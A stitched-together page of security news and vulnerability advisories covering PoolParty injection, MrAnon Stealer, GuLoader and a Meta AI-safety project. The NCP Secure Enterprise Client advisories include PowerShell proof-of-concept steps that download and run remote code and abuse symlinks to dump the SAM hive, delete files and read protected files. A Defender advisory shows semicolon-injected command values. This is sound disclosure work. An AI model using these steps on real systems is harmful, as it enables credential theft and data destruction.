A new collection of eight process injection techniques, collectively dubbed PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.
SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process

Endpoint Security / Malware

A new collection of eight process injection techniques, collectively dubbed **PoolParty**, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.

SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques."

The findings were first presented at the Black Hat Europe 2023 conference last week.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging.

PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system.

It works by targeting worker factories – which refer to Windows objects that are responsible for managing thread pool worker threads – and overwriting the start routine with malicious shellcode for subsequent execution by the worker threads.

"Other than the queues, the worker factory that serves as the worker threads manager may be used to take over the worker threads," Leviev noted.

SafeBreach said it was able to devise seven other process injection techniques using the task queue (regular work items), I/O completion queue (asynchronous work items), and the timer queue (timer work items) based on the supported work items.

PoolParty has been found to achieve 100% success rate against popular EDR solutions, including those from CrowdStrike, Cybereason, Microsoft, Palo Alto Networks, and SentinelOne.

The disclosure arrives nearly six months after Security Joes disclosed another process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems.

"Though modern EDRs have evolved to detect known process injection techniques, our research has proven that it is still possible to develop novel techniques that are undetectable and have the potential to make a devastating impact," Leviev concluded.

"Sophisticated threat actors will continue to explore new and innovative methods for process injection, and security tool vendors and practitioners must be proactive in their defense against them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PoolParty Process Injection Techniques Outsmart Top EDR Solutions

By Waqas
Received an email about a hotel reservation you didn't book? It's likely a phishing attempt delivering the MrAnon Stealer malware.
This is a post from HackRead.com Read the original post: Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

MrAnon Stealer is capable of stealing data and gathering information from cryptocurrency wallets, browsers, messaging apps and VPN clients.

Cybersecurity researchers at FortiGuard Labs have brought to light a new email phishing campaign exploiting false hotel reservations to lure unsuspecting victims. The phishing attack involves the deployment of a malicious PDF file that, once opened, unleashes a chain of events leading to the activation of the MrAnon Stealer malware.

Rather than relying on complex technical details, the attackers cunningly pose as a hotel reservation company, sending phishing emails under the subject, “December Room Availability Query.” The email body contains fabricated holiday season booking details, with the malicious PDF file hiding a downloader link.

The phishing email (Screenshot credit: Fortinet Labs)

Upon closer inspection, cybersecurity experts at FortiGuard Labs uncovered a multi-stage process involving .NET executable files, PowerShell scripts, and deceptive Windows Form presentations. The attackers, posing as a hotel reservation company, skillfully navigate through these stages, using tactics like false error messages to cloak the successful execution of the malware.

The MrAnon Stealer, a Python-based infostealer, operates discreetly, compressing its activities with cx-Freeze to slip past detection mechanisms. The malware executes a meticulous process that includes capturing screenshots, retrieving IP addresses, and stealing sensitive data from various applications.

The attackers demonstrate sophistication by terminating specific processes on the victim’s system and masquerading as legitimate connections to fetch IP addresses, country names, and country codes. The stolen data, including credentials, system information, and browser sessions, is compressed, secured with a password, and uploaded to a public file-sharing website.

According to FortiGuard Labs’ blog post, MrAnon Stealer can gather information from cryptocurrency wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. Additionally, it targets VPN clients like NordVPN, ProtonVPN, and OpenVPN Connect.

As for its command and control; the attackers use the Telegram channel as a communication medium. The stolen data, system information, and a download link are sent to the attacker’s Telegram channel using a bot token.

MrAnon Stealer on Telegram and its prices & packages for other cybercriminals (Screenshot credit: Fortinet Labs)

This campaign, active and aggressive during November 2023, primarily targeted Germany, as indicated by the surge in queries for the downloader URL during that period. The cybercriminals behind this operation have exhibited a strategic approach, shifting from Cstealer in July and August to the more potent MrAnon Stealer in October and November.

If you are online, you are vulnerable. Therefore, users are advised to exercise caution when dealing with unexpected emails, especially those containing dubious attachments. Cautiousness and commonsense are keys to thwarting cybercriminals’ attempts to exploit human vulnerabilities and compromise online security.

****_RELATED ARTICLES_****

1.  **Booking.com Scam Targeting Guests with Vidar Infostealer**
2.  **Silent Ransom Group Utilizes Callback Phishing for Network Hacks**
3.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**
4.  **Iran’s MuddyWater Group Hits Israelis with Fake Memo Spear-Phishing**
5.  **LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts**

Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.

> _Reviewable_ status: 9 of 14 files reviewed, 3 unresolved discussions (waiting on @Jontified)

_mullvad-paths/src/windows.rs line 146 at r3 (raw file):_

>     // Authenticated users SID https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
>     let (authenticated\_users\_ea, authenticated\_users\_psid) =
>         match create\_explicit\_access("S-1-5-11", GENERIC\_READ) {

This is fine, but it seems like we could have used CreateWellKnownSid(WinAuthenticatedUserSid, ...) and CreateWellKnownSid(WinBuiltinAdministratorsSid, ...) here.

A nice thing about it is that we allocate the memory ourselves, so most of the LocalFrees go away, and we only have to use plain arrays or Vecs. Cleaner, probably?

Though I vaguely recall that this did not work for some reason.

_mullvad-paths/src/windows.rs line 217 at r3 (raw file):_

>     let sid\_wide\_str = get\_wide\_str(sid\_wide\_str);
>     let mut psid = ptr::null\_mut();
>     if 0 == unsafe { ConvertStringSidToSidW(sid\_wide\_str.as\_ptr(), &mut psid) } {

I think we should avoid Yoda conditions, as they're inconsistent with our general code style. The point of these is mainly to prevent accidental assignment, which isn't relevant for if statements in Rust.

CVE-2023-50446: Set permissions on log directory by Jontified · Pull Request #5398 · mullvad/mullvadvpn-app

The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.

CVE-2023-50430: A Touch of Pwn - Part I

Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging.
"While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs

Threat hunters have unmasked the latest tricks adopted by a malware strain called **GuLoader** in an effort to make analysis more challenging.

"While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic said in a report published this week.

First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions.

A steady stream of open-source reporting into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented features.

GuLoader is typically spread through phishing campaigns, where victims are tricked into downloading and installing the malware through emails bearing ZIP archives or links containing a Visual Basic Script (VBScript) file.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

Israeli cybersecurity company Check Point, in September 2023, revealed that "GuLoader is now sold under a new name on the same platform as Remcos and is implicitly promoted as a crypter that makes its payload fully undetectable by antiviruses."

One of the recent changes to the malware is an improvement of an anti-analysis technique first disclosed by CrowdStroke in December 2022 and which is centered around its Vectored Exception Handling (VEH) capability.

It's worth pointing out that the mechanism was previously detailed by both McAfee Labs and Check Point in May 2023, with the former stating that "GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis."

The method "consists of breaking the normal flow of code execution by deliberately throwing a large number of exceptions and handling them in a vector exception handler that transfers control to a dynamically calculated address," Check Point said.

GuLoader is far from the only malware family to have received constant updates. Another notable example is DarkGate, a remote access trojan (RAT) that enables attackers to fully compromise victim systems.

Sold as malware-as-a-service (MaaS) by an actor known as RastaFarEye on underground forums for a monthly fee of $15,000, the malware uses phishing emails containing links to distribute the initial infection vector: a VBScript or Microsoft Software Installer (MSI) file.

Trellix, which analyzed the latest version of DarkGate (5.0.19), said it "introduces a new execution chain using DLL side-loading and enhanced shellcodes and loaders." Further, it comes with a complete rework of the RDP password theft feature.

"The threat actor has been actively monitoring threat reports to perform quick changes thus evading detections," security researchers Ernesto Fernández Provecho, Pham Duy Phuc, Ciana Driscoll, and Vinoo Thomas said.

"Its adaptability, the speed with which it iterates, and the depth of its evasion methods attest to the sophistication of modern malware threats."

The development comes as remote access trojans like Agent Tesla and AsyncRAT have been observed being propagated using novel email-based infection chains that leverage steganography and uncommon file types in an attempt to bypass antivirus detection measures.

It also follows a report from the HUMAN Satori Threat Intelligence Team about how an updated version of a malware obfuscation engine called ScrubCrypt (aka BatCloak) is being used to deliver the RedLine stealer malware.

"The new ScrubCrypt build was sold to threat actors on a small handful of dark web marketplaces, including Nulled Forum, Cracked Forum, and Hack Forums," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Unveal GuLoader Malware's Latest Anti-Analysis Techniques

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link.

**usd-2022-0005 | NCP Secure Enterprise Client - Insecure Registry Export**

**Advisory ID:** usd-2022-0005  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure Registry Export  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _Windows Registry_ is a central storage location for configuration settings on the _Windows_ operating system. Data that is stored  
within the _Windows Registry_ is utilized by several different components, like desktop applications, services, device drivers and also  
the kernel itself. Several locations within the _Windows Registry_ are known to contain sensitive information. The probably most well  
known example is the **HKLM\\SAM** hive, that stores hashed credentials of local user accounts.

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. Within this diagnostic information, the _NCP Secure Enterprise_ client also exports information  
from the _Windows Registry_. During this export, _Registry symbolic links_ are followed and may allow to redirect the export to an arbitrary  
location within the _Windows Registry_.

For such an attack to work, a low privileged user accounts need to be able to create _Registry symbolic links_ within the exported _Registry  
keys_. In the case of the _NCP Secure Enterprise_ client, this is possible, since the client exports all keys under **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services\*_recursively. On a default installation of_ Windows_, this_ Registry key _usually contains some keys where low privileged user accounts  
can create_ subkeys_. Newly created_ subkeys _are owned by the creating user and it is possible to create_ Registry symbolic links_within them that point to arbitrary_ Registry _locations. Since the_ symlink\* originates from a trusted** HKLM __hive, it is not restricted  
by_ Microsoft's_ protection features for _Registry symbolic links_.

**Proof of Concept**

The first step is finding a _Registry key_ within **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services** that is writable for low privileged  
user accounts. Corresponding keys might vary for different installations, but on our test systems it was always possible to find at least  
one such key. In the following we use the key **HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment** which seems to be available and allows  
the creation of _subkeys_ on most installations.

Within this _Registry key_ we now create a _symbolic link_ pointing to **HKLM\\SAM**

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> \[de.usd.SharpLink.RegistryLink\]::CreateKey("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB")  
\[+\] Creating registry key: HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB  
\[+\] Registry key was successfully created.  
PS C:\\> $r \= New-Object de.usd.SharpLink.RegistryLink("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK", "HKLM\\SAM")  
PS C:\\> $r.Open()  
\[+\] Creating registry key: \\Registry\\Machine\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK  
\[+\] Assigning symlink property pointing to: \\Registry\\Machine\\SAM  
\[+\] RegistryLink setup successful!

After the _Registry symbolic link_ is setup, one can start the _Support Assistant_ using the _NCP Secure Enterprise_ client tray icon  
(upper right inside the _Help_ menu). After the _Support Assistant_ was started, it collects support information from the operating system:

The collected files can be viewed either from the _Support Assistant_ directly or by inspecting them in **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*\*.  
Within the** Services.reg **file, one can find the export of the** HKLM\\SAM\*\* hive:

**Fix**

During the collection of support information from the operating system, the _NCP Secure Enterprise_ client software should impersonate  
the user that started the _Support Assistant_. This way, only information that the invoking user is allowed to read can be obtained.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28871: Security Advisory usd-2022-0005 | usd HeroLab

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0002 | NCP Secure Enterprise Client - Arbitrary File Delete**

**Advisory ID:** usd-2022-0002  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Delete  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. The corresponding information is gathered by high privileged services and stored within the directory  
__C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_. Since this directory is fully user controlled, a low privileged user can create_ symbolic links_within it. This can be used to trick the_ NCP Secure Enterprise\* client to delete arbitrary files on the operating system.

**Proof of Concept**

To perform the arbitrary file delete, the following steps are necessary:

1.  Start the _Support Assistant_ and wait until all diagnostic information has been collected.
2.  Create a _symbolic link_ that originates from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
    and points to the targeted file.
3.  Abort the _Support Assistant_ and restart it.

After these steps have been executed, the targeted file should be deleted. In the following, we demonstrate  
each of the above mentioned steps.

First we start the _Support Assistant_ by using the tray icon of the _NCP Secure Enterprise_ client. The _Support Assistant_  
feature can be found in the upper right of the graphical user interface within the _Help_ menu.

After the diagnostic information has been collected, we create a _symbolic link_ pointing from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
to the well known **C:\\Windows\\win.ini** file.

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\win.ini")  
PS C:\\> $s.Open()  
\[!\] Junction directory C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport is not empty. Delete files? (y/N) y  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\win.ini  
\[+\] Symlink setup successfully.

Now the _Support Assistant_ is aborted and restarted. After this action has been performed, the **win.ini** does no longer exist.

PS C:\\> dir C:\\Windows\\win.ini  
dir : Der Pfad "C:\\Windows\\win.ini" kann nicht gefunden werden, da er nicht vorhanden ist.  
In Zeile:1 Zeichen:1  
+ dir C:\\Windows\\win.ini  
+ \~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\\Windows\\win.ini:String) \[Get-ChildItem\], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

**Fix**

It is assumed that the _NCP Secure Enterprise_ client checks for already existing diagnostic files before starting  
the _Support Assistant_ and attempts to delete them. This delete operation occurs with high privileges, resulting  
in the vulnerability. Instead, the delete operation should be performed while impersonating the invoking user account.  
This prevents the deletion of files the invoking user has insufficient permissions for.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is realesed
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28868: Security Advisory usd-2022-0002 | usd HeroLab

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read**

**Advisory ID:** usd-2022-0003  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Read  
**Security Risk:** High  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. After the corresponding information was collected, users can inspect the contents of the collected  
files within the graphical user interface of the _NCP_ application. Despite the graphical user interface runs with the permissions of the  
current user, inspecting a diagnostic file causes a high privileged service to read the contents of it. After reading, the contents are send to  
the graphical user interface of the _NCP_ application and displayed to the invoking user.

After the _Support Assistant_ has collected the diagnostic files, they are stored within the directory __C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_.  
This is also the directory where the high privileged service obtains the file contents from when files are inspected within the graphical  
user interface. Since the directory is fully user controlled, low privileged users can use a_ symbolic link\* to redirect the read operation to  
an arbitrary target.

**Proof of Concept**

The first step is to start the _Support Assistant_ within the tray icon of the _NCP Secure Enterprise_ client. The corresponding function  
can be found in the upper right of the graphical user interface under the _Help_ menu. After the _Support Assistant_ has collected the  
diagnostic information, the corresponding files are displayed within the graphical user interface:

Now it is possible to replace one of the files with a _symbolic link_ to an arbitrary target. In the following listing we replace the  
file **C:\\Users\\\\AppData\\Local\\Temp\\NCPSupport\\services.txt** with a _symbolic link_ pointing to **C:\\Windows\\CCM\\CcmEval.xml**.  
Moreover, we demonstrate that the target file is not readable for a low privileged user account:

PS C:\\> type C:\\Windows\\CCM\\CcmEval.xml  
type : Der Zugriff auf den Pfad "C:\\Windows\\CCM\\CcmEval.xml" wurde verweigert.  
In Zeile:1 Zeichen:1  
+ type C:\\Windows\\CCM\\CcmEval.xml  
+ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    + CategoryInfo          : PermissionDenied: (C:\\Windows\\CCM\\CcmEval.xml:String) \[Get-Content\], UnauthorizedAccessException    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommandPS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\CCM\\CcmEval.xml")  
PS C:\\> $s.Open()  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\CCM\\CcmEval.xml  
\[+\] Symlink setup successfully.

Now it is time to inspect the file **services.txt** within the _Support Assistant_ graphical user interface.  
Clicking the corresponding file twice shows the contents of the targeted file:

**Fix**

It is not evident why a high privileged service is used to display the obtained diagnostic information. The read operation  
should be performed by the low privileged process instead, which also draws the graphical user interface.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28869: Security Advisory usd-2022-0003 | usd HeroLab

Microsoft Defender API and PowerShell APIs suffer from an arbitrary code execution due to a flaw in powershell not handling user provided input that contains a semicolon.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt[+] twitter.com/hyp3rlinx[+] x.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows PowerShell[Vulnerability Type]Arbitrary Code Execution[CVE Reference]N/A[Security Issue]Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code.E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code.This vector builds upon my previous advisory and subsequent project PSTrojanFile.Requirements:1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script2) Executable file of same name as the parameter that lives nearbyExamples:powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip"(Helper.exe lives on Desktop)Create directory  ";saps Test", Test.exe, Test.cmd etc is on same CL pathpowershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"Create directory with semicolon, drop PE file named doom.exe in same path.powershell Set-ProcessMitigation -PolicyFilePath  "test;saps doom"TODO: Update PSTrojanFile[References]http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txthttps://github.com/hyp3rlinx/PSTrojanFilehttps://packetstormsecurity.com/files/153863/Microsoft-Windows-PowerShell-Command-Execution.htmlhttps://www.exploit-db.com/exploits/47248https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender[Video PoC URL]https://www.youtube.com/watch?v=0Go6yJiRWP8[Network Access]Remote [Severity]High[Disclosure Timeline]Vendor Notification:  circa (2019)December 7, 2023 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution

Meta's Project Llama aims to help developers filter out specific items that might cause their AI model to produce inappropriate content.

Meta has announced Purple Llama, a project that aims to “bring together tools and evaluations to help the community build responsibly with open generative AI models.”

Generative Artificial Intelligence (AI) models have been around for years and their main function, compared to older AI models is that they can process more types of input. Take for example the older models that were used to determine whether a file was malware or not. The input is limited to files and the output usually comes in the form of a percentage. (e.g. The chance that this file is malicious is 90%. ).

Generative AI models are capable of sorting through more types of information. Take for example Large Language Models (LLMs) that can process text, images, videos, songs, diagrams, webinars, computer code, and other similar types of input.

Generative AI models are the closest to human creativity we can get at this point in time. As such, generative AI has brought about a new wave of innovations. It enables us to have a conversation with models like ChatGPT, create images based on instructions, and summarize large amounts of text(s). It can even write papers to the point where scientists have a hard time telling them apart from human work.

According to Meta’s statement:

> “Collaboration on safety will build trust in the developers driving this new wave of innovation, and requires additional research and contributions on responsible AI.”

For this reason, Meta is collaborating in project Purple Llama with other AI application developers like Microsoft and cloud platforms like AWS and Google Cloud, and chip designers like Intel, AMD, and Nvidia.

LLMs can generate code, that fails to follow security best practices or introduce exploitable vulnerabilities. Given that GitHub recently proudly touted that 46% of code is produced with the help of their CoPilot AI, this is far from just a theoretical risk.

So, it makes sense that the first step in project Purple Llama focuses on tools to test cyber security issues in software-generating models. This package allows developers to run benchmark tests to check how likely it is for an AI model to generate insecure code or assist users in carrying out cyberattacks.

The package is introduced under the name CyberSecEval, a comprehensive benchmark developed to help bolster the cybersecurity of LLMs employed as coding assistants. Initial tests showed that on average, LLMs suggested vulnerable code 30% of the time.

To check and filter all the inputs and outputs of a LLM, Meta released Llama Guard. Llama Guard is a freely available model that provides developers with a pretrained model to help defend against generating potentially risky outputs. The model has been trained on a mix of publicly available datasets to help find common types of potentially risky, or violating content. This will allow developers to filter out specific items that might cause a model to produce inappropriate content.

The announcement has come at the same time as the Cybersecurity & Infrastructure Security Agency (CISA) has published a guide setting out The case for memory safe roadmaps. In its guidance, CISA attempts to provide manufacturers with steps they can take towards creating and publishing memory safe roadmaps as part of the international Secure by Design campaign.

Memory safety vulnerabilities are a class of well-known and common coding errors that cybercriminals exploit quite often. Coding errors that could increase in numbers unless we take steps toward using memory safe programming languages and use the methods to check the code generated by LLMs.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#microsoft